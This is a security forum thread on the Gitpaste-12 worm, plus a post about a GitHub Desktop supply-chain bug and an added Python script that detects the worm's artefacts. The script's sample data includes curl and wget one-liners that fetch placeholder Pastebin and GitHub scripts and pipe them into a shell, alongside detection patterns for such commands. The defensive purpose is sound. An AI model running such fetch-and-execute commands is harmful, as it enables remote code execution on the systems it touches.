Reverse shell botnet Gitpaste-12 spreads via GitHub and Pastebin

Correlate

Level 16
Verified
May 4, 2019
721
A newly discovered worm and botnet named Gitpaste-12 lives on GitHub and also uses Pastebin to host malicious code.

The advanced malware comes equipped with reverse shell and crypto-mining capabilities and exploits over 12 known vulnerabilities, hence the moniker.

Correlate

Level 16
Verified
May 4, 2019
721
This post is a rather unusual story of a vulnerability that could be leveraged as a supply chain attack and used to attack millions of software developers around the world. It is also a tale of a bug collision that paid a bounty to one reporter and assigned the CVE to another!

The main focus of this blog post is GitHub Desktop. Other Git clients such as GitKraken, Git-Tower and SourceTree were also found to be vulnerable; however, these have different exploitation scenarios that require user interaction.

silversurfer

Level 68
Verified
Trusted
Content Creator
Malware Hunter
Aug 17, 2014
5,757
Researchers at Juniper Threat Labs observed the second iteration of Gitpaste-12 on November 10th 2020, present on a different GitHub repository.
Expanding on its predecessor, this new version of Gitpaste-12 comes equipped with over 30 vulnerability exploits, concerning Linux systems, IoT devices, and open-source components.
Initially, the researchers observed the new GitHub repository containing just 3 files.
"The wave of attacks used payloads from yet another GitHub repository, which contained a Linux cryptominer ('ls'), a list of passwords for brute-force attempts ('pass') and a statically linked Python 3.9 interpreter of unknown provenance," explains Asher Langton, a researcher at Juniper Threat Labs. [...]
The complete research findings and a list of Gitpaste-12 Indicators of Compromise (IOCs) can be found in Juniper Threat Labs' blog post.
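As an added example (not code from this thread, from BleepingComputer, or from Juniper Threat Labs), the Python script below hunts for the two artefact patterns the post describes: a payload dropped under an innocuous command name such as ls (generalised here to any watched name, including a python3.9 interpreter, running from outside the system binary directories) and a one-liner that fetches a stager from Pastebin or raw GitHub and pipes it straight into a shell. The process list, command lines, paths and URLs are all constructed for illustration; the watched names, directory list and host list are assumptions, not indicators published by the research.

```python
"""Added example: hunting for Gitpaste-12-style artefacts on a Linux host.

Two checks, both derived from the description in the post above:
  1. a process whose command name is a watched name ('ls', 'python3.9')
     but whose executable does not live under a system binary directory;
  2. a shell command that downloads from Pastebin or raw GitHub and pipes
     the result into a shell interpreter.
All sample data is constructed; the watched names, paths and hosts are
assumptions for illustration, not indicators published by the research.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Directories where a legitimately installed ls or Python interpreter is
# expected to live (assumption; extend for your distribution).
SYSTEM_BIN_DIRS = ("/bin/", "/usr/bin/", "/usr/local/bin/", "/sbin/", "/usr/sbin/")

# Command names the reporting associates with the dropped payloads.
WATCHED_NAMES = {"ls", "python3.9"}

# Hosts the reporting names as payload stagers (assumption: any fetch from
# them that is piped straight into a shell deserves analyst review).
STAGING_HOSTS = ("pastebin.com", "raw.githubusercontent.com", "github.com")

FETCHER = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|z|da)?sh\b")
URL_HOST = re.compile(r"https?://([\w.-]+)")


@dataclass(frozen=True)
class Finding:
    kind: str
    detail: str


def check_process(pid: int, comm: str, exe: str) -> Optional[Finding]:
    """Flag a watched command name running from outside the system bin dirs."""
    if comm in WATCHED_NAMES and not exe.startswith(SYSTEM_BIN_DIRS):
        return Finding("masquerading_binary", f"pid {pid} comm={comm} exe={exe}")
    return None


def check_command(line: str) -> Optional[Finding]:
    """Flag curl/wget from a staging host whose output is piped into a shell."""
    if not (FETCHER.search(line) and PIPE_TO_SHELL.search(line)):
        return None
    hosts = [
        h for h in URL_HOST.findall(line)
        if any(h == s or h.endswith("." + s) for s in STAGING_HOSTS)
    ]
    if hosts:
        return Finding("remote_stager", f"{','.join(hosts)}: {line.strip()}")
    return None


def hunt(processes: List[Tuple[int, str, str]], commands: List[str]) -> List[Finding]:
    """Run both checks over the supplied data and return every finding."""
    findings = [f for p in processes if (f := check_process(*p))]
    findings += [f for c in commands if (f := check_command(c))]
    return findings


# Constructed sample data (not real IOCs): (pid, comm, resolved exe path).
SAMPLE_PROCESSES = [
    (1234, "ls", "/usr/bin/ls"),             # the real ls, ignored
    (4321, "ls", "/tmp/.cache/ls"),          # miner dropped under the name 'ls'
    (777, "python3.9", "/tmp/python3.9"),    # static interpreter of unknown origin
    (900, "sshd", "/usr/sbin/sshd"),         # not a watched name
]
SAMPLE_COMMANDS = [
    "curl -fsSL https://pastebin.com/raw/placeholder | sh",
    "wget -qO- https://raw.githubusercontent.com/example/repo/main/s.sh | bash",
    "curl -s https://example.org/install.sh | sh",   # not a staging host
    "ls -la /tmp",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_PROCESSES, SAMPLE_COMMANDS):
        print(f"[{f.kind}] {f.detail}")
```

On a live host the process tuples would come from /proc/PID/comm and a readlink of /proc/PID/exe, and the command lines from shell history, cron entries and auditd execve records; the host allow-list deliberately errs toward false positives, since plenty of legitimate installers also pipe GitHub content into a shell, so treat a hit as a lead to triage rather than a verdict.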